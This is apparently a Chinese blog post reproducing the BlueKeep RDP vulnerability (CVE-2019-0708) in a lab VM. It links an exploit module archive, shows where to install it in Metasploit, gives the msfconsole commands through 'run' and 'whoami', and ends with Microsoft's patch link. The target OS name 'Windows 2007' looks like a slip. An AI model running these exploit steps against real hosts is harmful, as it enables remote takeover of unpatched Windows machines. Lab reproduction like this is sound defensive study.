0%

CVE-2019-0708复现

BlueKeep(CVE-2019-0708)是微软远程桌面协议(RDP)实现中发现的一个安全漏洞,它允许远程执行代码。

复现过程:

目标机:Windows 2007 X64 192.168.30.129
攻击机:kali 192.168.30.128

windows配置
1

kali 配置 - MSF下替换文件
EXP下载地址:https://github.com/backlion/demo/blob/master/CVE-2019-0708_RDP%20_MSF.zip

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

root@kali:~# msfconsole
2

msf5 > reload_all #重新加载所有模块
msf5 > search cve_2019_0708
3

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
4

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >set RHOSTS 192.168.30.129
5

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >set target 3
6

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >show options
7

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >run
8

执行whoami
9

遇到的坑

这种情况是把虚拟机打蓝屏了,此时,关机重启,多试几次。哈哈哈哈哈!(鬼知道我打蓝屏了多少次)
10
11

修复建议:
安装微软为2019-0708推出的专用补丁:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708